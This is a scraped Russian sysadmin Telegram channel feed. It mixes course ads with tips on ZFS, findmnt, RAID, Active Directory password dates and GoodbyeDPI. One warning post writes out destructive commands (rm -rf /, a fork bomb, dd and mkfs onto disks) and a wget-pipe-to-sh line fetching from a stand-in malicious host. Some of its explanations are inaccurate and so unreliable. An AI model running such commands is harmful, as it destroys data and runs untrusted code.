Системный Администратор (Сисадмин)

⚡️ Квиз на знание K8s Попробуйте пройти тест из 15 вопросов за 30 минут и вы узнаете свой уровень знаний K8s. Квиз специально подготовлен под онлайн-курс «Инфраструктурная платформа на основе Kubernetes» от Отус. ➡️ ПРОЙТИ КВИЗ: https://vk.cc/cz6gU9 🔥 Это курс для девопсов, администраторов, разработчиков и CTO, которые хотят получить квалификацию платформенного инженера и самостоятельно создать инфраструктурную платформу в своей компании. 📦 Пройдете успешно квиз, бонусом получите доступ к записям прошедших вебинаров курса. Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

Как изменить дату установки пароля пользователя в Active Directory У учетной записи пользователя в ActiveDirectory есть два атрибута, в которых хранится последнее время смены пароля учетной записи. Это атрибуты pwdLastSet и PasswordLastSet. Различаются они форматом записи. PasswordLastSet хранит данные в нормальном читабельном виде, а вот в pwdLastSet дата хранится в виде большого целого числа, которое представляет собой количество 100-наносекундных интервалов, прошедших с 12:00 полуночи, 1 января 1601 года нашей эры в формате UTC (Coordinated Universal Time). https://telegra.ph/Kak-izmenit-datu-ustanovki-parolya-polzovatelya-v-Active-Directory-08-08 👉 @sysadminof

Электронная почта Как работает электронная почта Полноценный почтовый сервер за 15 минут Настройка Postfix. Режимы работы почтовых серверов Протокол SMTP, расширение STARTTLS и то, что не стоит поминать DNS записи для почтовых серверов Документация по Postfix Как работает электронная почта Режимы работы почтовых серверов Про порты и шифрование в почтовых серверах DNS записи для почтовых серверов источник 👉 @sysadminof

⁉️ Хотите настроить гибкий роутер на базе Linux-машины, но не знаете, с чего начать? Сталкиваетесь с трудностями в настройке маршрутизатора и предоставлении доступа в Интернет для локальной сети? Чувствуете, что вам не хватает знаний для уверенной работы с сетевыми настройками? ❗️Это поправимо! Представьте, что вы знаете, как правильно настроить маршрутизатор, предоставлять доступ в Интернет для локальной сети и настраивать сетевой фильтр. Ваши навыки востребованы и вы уверенно справляетесь с любыми задачами сетевой конфигурации. Присоединяйтесь к открытому вебинару 12 августа в 19:00 мск и сделайте этот прыжок в будущее! 🎙 Спикер Николай Лавлинский — PhD Economic Sciences, опытный разработчик, автор курсов по администрированию и оптимизации веб-приложений, ведущий каналов «Ускорение сайтов» и «Поддержка сайтов». ➡️Запишитесь на вебинар и прокачайте свои навыки работы с сетевыми настройками в Linux: https://vk.cc/cz4k46 Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

11 опасных команд Linux, которые вы никогда не должны запускать rm -rf / - Эта команда удалит все файлы и папки на вашем компьютере. Не запускайте ее, если не хотите потерять все свои данные. :(){ :|: & };: - Это команда, также известная как "fork bomb", может вызвать переполнение памяти на вашем компьютере и привести к аварийному завершению системы. mkfs.ext4 /dev/sda - Эта команда форматирует жесткий диск без какого-либо предупреждения или подтверждения. Все данные будут утеряны. dd if=/dev/random of=/dev/sda - Эта команда перезапишет все данные на жестком диске случайными значениями, что приведет к потере данных. chmod 777 / - Эта команда откроет полный доступ к вашей файловой системе для всех пользователей, что может привести к нарушению безопасности. mv /home/* /dev/null - Эта команда переместит все файлы в вашей домашней директории в "null", что означает, что они будут утеряны. wget http://example.com/file -O /dev/null - Эта команда загрузит файл и перезапишет все данные в "null", что приведет к потере данных. mkfs.ext4 /dev/sda1 - Эта команда форматирует раздел жесткого диска без какого-либо предупреждения или подтверждения. Все данные на этом разделе будут утеряны. ln -s /dev/null /etc/passwd - Эта команда создаст символическую ссылку на "/etc/passwd" в "null", что приведет к потере данных. echo "Hello" > /dev/sda - Перезапишите свой раздел, это заменит ваш раздел, содержащий все данные, необходимые для загрузки системы, строкой «Hello». wget http://malicious_source -O- | sh - Такие команды будут загружать и запускать в вашей системе вредоносные сценарии, которые могут подорвать безопасность вашей системы. 👉 @sysadminof

До / После 👉 @sysadminof

❔ Какие три характеристики лежат в основе эффективной IT-инфраструктуры? 🔵Наблюдаемость 🔵Безопасность 🔵Производительность Но при нехватке профессионализма эти три характеристики могут легко превратиться в три проблемы. О том, как совершенствовать производительность, укреплять безопасность и повышать наблюдаемость систем вы узнаете на конференции «OTUS CONF: Инфраструктура». ⭐️Спикеры – эксперты из ведущих компаний: девопс-инженер, технический директор и архитектор Важно: перед конференцией мы хотим узнать, что волнует вас на самом деле. Поэтому скорее переходите по ссылке внизу и заполняйте форму с вопросами спикерам. На самые интересные вопросы ответим в конце события! 🌟Бонус! Участников конференции ожидают полезные призы. Подробности – на странице мероприятия. Приглашаем девопс-инженеров, фулстек-разработчиков, системных и сетевых админов. архитекторов ПО, менеджеров продуктов и проектов. 8 августа, 19:00 МСК Участие бесплатное ➡️ Записаться на конференцию Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

CMatrix Основана на заставке к фильму "Матрица". Показывает текст, прокручивающийся в терминале, может прокручивать строки с одинаковой скоростью или асинхронно и с заданной пользователем скоростью. Установка $ sudo apt-get install cmatrix # Linux Включите асинхронную прокрутку: cmatrix -a Отображение красного текста: cmatrix -C {{red}} Включить режим радуги: cmatrix -r Установите задержку обновления экрана на 2 сантисекунды: cmatrix -u {{2}} Исходный код доступен на GitHub. 👉 @sysadminof

Зайд Менк, 17-летний студент из Зимбабве, потратил более 3 месяцев на создание масштабной модели Манхэттена из переработанных компьютерных деталей. 👉 @sysadminof

🦖 Представляем себя героями фильма «Парк Юрского периода» и отправляемся исследовать STP Вы когда-нибудь задумывались, почему столь немолодое семейство протоколов STP до сих пор живее всех живых? Ждем вас на открытом вебинаре 7 августа в 20:00 мск, где мы разберём: - почему появился протокол STP и его разновидности; - какие протоколы появились после STP; - сравнение 2 стандартных протоколов между собой; - основы применения протоколов защиты 2-го уровня (L2) ISO OSI; - практическую реализацию сети с такой защитой. Урок будет полезен сетевым инженерам, сетевым архитекторам и всем, кто глубоко интересуется современными сетевыми технологиями. Встречаемся в рамках курса «Network Engineer». Все участники вебинара получат специальную цену на обучение! Регистрация открыта: https://otus.pw/RQ6a/?erid=2VtzqwQSUDR

Команда findmnt Это простая утилита командной строки, используемая для отображения списка подключенных файловых систем или поиска файловой системы в /etc/fstab, /etc/mtab или /proc/self/ mountinfo. Для отображения списка подключенных файловых систем, выполните в командной строке следующую команду. По умолчанию команда findmnt отображает файловые системы в древовидном формате. # findmnt Чтобы отобразить информацию в виде обычного списка, используйте параметр -l, как показано ниже # findmnt -l Можно выбрать отображение файловых систем только определенного типа, используя параметр командной строки -t, за которым следует тип файловой системы, такой как XFS или EXT4. # findmnt --fstab -t xfs или # findmnt --fstab -t ext4 Поиск файловой системы, используя точку монтирования. Например, следующая команда отображает все файловые системы /etc/fstab, где каталогом точки монтирования является /mnt/external/disk2. # findmnt --fstab /mnt/external/disk2 #this prints bind mounts where /mnt/external/disk2 is a source или # findmnt --fstab --target /mnt/external/disk2 Выводим все файловые системы /etc/fstab и преобразовываем теги LABEL = и UUID = в реальные имена устройств, добавьте ключ – –evaluate # findmnt --fstab --evaluate Отобразить только точку монтирования, в которой смонтирована файловая система с меткой «/ boot» или «/», используйте следующую команду. # findmnt -n --raw --evaluate --output=target LABEL=/boot или # findmnt -n --raw --evaluate --output=target LABEL=/ Findmnt также позволяет отслеживать действия по монтированию, размонтированию, перемонтированию и перемещению каталога, например, в /mnt/test. # findmnt --poll --mountpoint /mnt/test Если вы хотите больше информации в выводе, используйте ключ –verbose. # findmnt --real --verbose 👉 @sysadminof

Relax-and-Recover Решение для аварийного восстановления и миграции систем на новое железо под управлением Linux (ср. mksysb, ignite) Relax-and-Recover создает загрузочный образ. Этот образ может переразметить систему. После этого запускается восстановление из резервной копии. Возможно восстановление на другое оборудование. Поэтому Relax-and-Recover можно использовать и как инструмент миграции. В настоящее время Relax-and-Recover поддерживает различные загрузочные носители (включая ISO, PXE, ленту OBDR, USB или eSATA), разнообразные сетевые протоколы (включая sftp, ftp, http, nfs, cifs), а также множество стратегий резервного копирования (включая IBM TSM, CommVault, Micro Focus Data Protector, Symantec NetBackup, Bareos, Bacula, rsync, Borg). Решение Relax-and-Recover было разработано для простой настройки, не требует обслуживания и готово прийти на помощь в случае бедствия. Его характер "установил и забыл" устраняет любые оправдания для отсутствия решения по аварийному восстановлению. http://relax-and-recover.org/ https://github.com/rear/rear 👉 @sysadminof

👀Только начинаете свой путь в системном анализе и впервые слышите о паттернах интеграции? Не знаете, с чего начать и как правильно интегрировать системы? Чувствуете, что вам не хватает знаний для уверенной работы? Представьте, что вы стали уверенно ориентироваться в процессе интеграции! Вы знаете основные способы настройки взаимодействия, их плюсы и минусы и понимаете, что делает системный аналитик в части интеграции. Вы готовы применять полученные знания на практике и становитесь востребованным специалистом. ⚙️Присоединяйтесь к открытому вебинару 12 августа в 20:00 мск и сделайте этот прыжок в будущее! Не упустите свой шанс! Регистрируйтесь на бесплатный вебинар и прокачайте свои навыки в системном анализе: https://vk.cc/cz0ysw Реклама. ООО "ОТУС ОНЛАЙН-ОБРАЗОВАНИЕ", ИНН: 9705100963

Написал свой сервис для удаленного управления компьютерами Я работал админом около 12 лет, за всё время для целей администрирования пользовался почти всеми известными программами для удаленного доступа, сначала TeamViewer - после внедрения их политики лицензирования и обновления, мягко говоря неудобной и жуткой дорогой (около 30 т.р. в год), пересел на AnyDesk — который был чуть хуже в плане функционала, но более терпим в плане использования, и немного меньшей ценой — около 20 т.р. за год. Но душа всё-таки не была довольна, не хватало многих функций, автоматизации, да и порой было неудобно/лень договариваться о подключении с пользователем, что бы выполнить пустяковое действие. И так пришла на ум идея создать инструмент от админа админу, что бы и интерфейс устраивал, но не был перенасыщен, и разобраться мог любой человек более менее владеющий компьютером. Ну и конечно санкции и новая их угроза послужила мотивом, зарубежные сервисы постепенно продавливаются или сами разделяют повестку ущемления обычных людей и к сожалению блокируют доступ к своим ресурсам. Хотя по моему мнению, IT компании как наука и спорт должны быть вне политики, не важно на какой стороне твой пользователь. И вот буквально на днях я закончил писать бета версию, залив её в продакшн, в которой реализовал базовые функции, достаточные для закрытия определенного процента потребностей: https://habr.com/ru/post/720186/ 👉 @sysadminof

Шпаргалка по ZFS modinfo zfs | head -n 9 - узнать версию ZFS и другие подробности Информация о пулах / файловых системах (ФС) на пулах zpool list - статус пулов zpool status -v - статус пулов подробный zfs list - список ФС, так называются монтируемые разделы в пулах zfs get all - вся инфа по пулам, вообще вся Управление пулами / дисками ls -lha /dev/disk/by-id/ - выяснить айдишники дисков чтобы потом на них создать пул (будут проблемы если подцепишь по буквенному названию диска типа sda, они динамически меняются) zpool create zfspool disk-id-1 disk-id-2 - может быть сколько угодно дисков, с ключом -f форсить создание пула zpool create -m /mnt/backups zfspool disk-id-1 - создать пул с указанием папки маунтирования zpool destroy zfspool - уничтожить пул zfspool, с ключом -f форсить уничтожение mkfile 100m disk1 disk2 - создать файлы дисков zpool create backups /disk1 /disk2- создать пул backups на созданных файлах zpool create zfspool mirror /disk1 /disk2 - создать пул zfspool с зеркалированием на 2 диска zpool add zfspool /disk3 - добавить диск в пул zpool attach zfspool /disk3 - добавить устройство в пул, если он в зеркале то станет в зеркало, если простой, то пул расширится zpool remove zfspool mirror-1 zpool detach zfspool /disk3 - исключить устройство из пула zpool remove zfspool /disk3 - удаление устройства из пула zpool add zfspool spare /disk3 - добавление диска горячей замены в пул zpool remove zfspool spare /disk3 - удаление диска горячей замены из пула zpool offline zfspool /disk1 - отключить устройство, на него не будет никакой записи и с него чтения, если добавить ключ -t, то после ребута станет онлайн zpool online zfspool /disk1 - включить disk1 zpool replace zfspool /disk1 /disk3 - заменить disk 1, например в случае неисправности на disk3 zpool upgrade -v - увидеть версию, и фичи текущего ZFS, -a обновит все пулы до новейшей версии Создание ФС и свойства ФС zfs create zfspool/data - создать ФС data zfs create zfspool/backups создать ФС backups, обе ФС будут бесконтрольно расти, пока не выставлены квоты zfs destroy -fr zfspool/backups/old - уничтожит ФС old, ключ -r - рекурсивно, если внутри ещё несколько ФС, -f - форсить zfs set reservation=1G zfspool/data - зарезервировать 1 Гигабайт, который ФС гарантированно получит, а другие не займут zfs list -o quota zfspool/backups - выяснить квоту в пуле на ФС backups zfs set quota=1G zfspool/backups - установить квоту в 1 Гигабайт на ФС backups zfs list -o compression - проверить включена компрессия или нет zfs set compression=on zfspool/backups - включить компрессию на ФС backups в пуле zfspool zfs set sharesmb=on zfspool/backups - расшарить по SMB ФС backups средствами ZFS zfs set sharenfs=on zfspool/backups - расшарить по NFS ФС backups средствами ZFS Маунт zfs mount - отобразить все маунтированные ФС zfs mount zfspool/backups - маунт ФС backups zfs umount zfspool/backups - анмаунт ФС backups zfs mount -a - маунт всех ФС ZFS zfs umount -a Umount - анмаунт всех ФС ZFS Снапшоты zfs list -t snapshot - отобразить все снапшоты zfs list -o space - сколько занимают места снапшоты и конкретные дети пулов zfs snapshot zfspool/backups@test - создать снапшот ФС backups с названием test zfs rollback zfspool/backups@test - вернуться к снапшоту backups с названием test, с ключом -r рекурсивно уничтожит промежуточные снапшоты, с ключом -f форсит анмаунт и ремаунт zfs destroy zfspool/backups@test - уничтожить снапшот backups с названием test zfs send zfspool/backups@march2021 > /home/backups/march2021.bak - сделать локальный бекап снапшота march2021 zfs receive zfspool2/backups2 < /home/backups/march2021.bak - Восстановить из локального снапшота ФС на другом пуле zfs send zfspool/backups@march2021 | zfs receive zfspool2/backups2 - Комбо предыдущих двух zfs send zfspool/backups@march2021 | ssh COMP02 “zfs receive testpool/testfs” - Отправить снапшот по SSH на хост COMP02 zfs clone zfspool/backups@march2021 /clones/backups - Клонировать существующий снапшот zfs destroy zfspool/backups@march2021 - Уничтожить клон 👉 @sysadminof

🌐 📖 Обслуживаете компьютеры в учебных учреждениях? Команда Яндекс Браузера для образования проводит вебинар для вас, где расскажет про установку и настройку браузера, разработанного специально для школ и вузов. В нём собраны полезные для учебы функции, всё остальное можно отключить 👨🏻‍🏫 Присоединяйтесь к вебинару 8 августа в 11:00 по Мск, чтобы узнать, как гибко настроить браузер для образования под нужды вашего учреждения на Windows и Linux. А ещё — как централизованно установить его на множество компьютеров. Зарегистрируйтесь по ссылке 👈🏻

Установка Ubuntu 20.04 в RAID 1. Настройка и восстановление RAID массива Настройка Software RAID при установке Ubuntu Server 20.04. Комманды в видео: cat /proc/mdstat | Просмотр состояния RAID fdisk -l | Простомотр дисков и разделов mdadm --add /dev/md1 /dev/sda2 | Добавление разделов (partition) в RAID sfdisk -d /dev/sda | sfdisk /dev/sdb | Клонирование разделов с диска sda на sdb grub-install /dev/sdb | Установка загрузчика на новый диск sdb 👉 @sysadminof

Обход замедления YouTube в России 1- Открываем GitHub и качаем GoodbyeDPI 2- Распаковываем архив и запускаем от имени администратора файл 1_russia_blacklist.cmd; 3- В открытой командной строке вы увидите надпись "GoodbyeDPI is now running!". Держите окно открытым и проверьте работоспособность YouTube. 4- Если YouTube всё ещё работает нестабильно, то откройте экспериментальные настройки браузера. Для этого в любом браузере откройте страницу "chrome://flags" (если у вас FireFox, то "about:config"). 5- В открытом меню отключите шифронабор Kyber и перезапустите браузер. https://github.com/ValdikSS/GoodbyeDPI/releases/tag/0.2.3rc1 👉 @Githublib

Diun. Система оповещения о новых Docker контейнерах Diun следит за установленными контейнерами и сравнивает их версии с версиями на репозиториях. 00:00 | Intro 00:16 | Проблема обновления docker 00:36 | Diun 00:53 | Сравнение с Watchtower. Основные функции 01:27 | Особенности обновления с Watchtower 03:02 | Проблема с образами image в Watchtower 04:21 | Diun обзор 04:56 | Diun системы уведомлений и провайдеры 06:15 | Diun. docker compose. Установка 08:21 | Расширенные параметры. Настройка diun. 11:00 | Запуск diun. Тест 12:03 | Crontab.guru - сервис настройски времени crontab (Scheduler) 12:30 | Тест diun. Уповещения в логе 13:34 | Настройка уведомлений в diun. Подключение к gotify 16:27 | Как обновить docker контейнер вручную. 17:13 | Преимущество diun уведомлений 18:12 | Gotify установка. docker compose. 18:34 | Спасибо источник 👉 @sysadminof

👉Тратите кучу времени и усилий на перенос данных между платформами, а результат все равно оставляет желать лучшего? Ваши коллеги недовольны, а рабочие процессы тормозят? А теперь представьте, что вы можете легко и надежно переносить данные с MS SQL в PostgreSQL, оптимизируя рабочие процессы вашей команды. Вы освоили инструмент Convertuum и знаете все тонкости конвертирования схемы и данных. 🔆Присоединяйтесь к открытому вебинару 7 августа в 20:00 мск и сделайте этот прыжок в будущее! На занятии вы узнаете: - как эффективно мигрировать данные между платформами; - основные этапы и лучшие практики переноса; - особенности работы с Convertuum, включая возможности преобразования схемы и переноса данных; - как обеспечить безопасность и целостность информации в процессе миграции. 👉Вы получите ценные знания и практические советы, которые можно сразу применить в работе. Регистрируйтесь прямо сейчас, чтобы не пропустить мероприятие: https://vk.cc/cySX6D Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru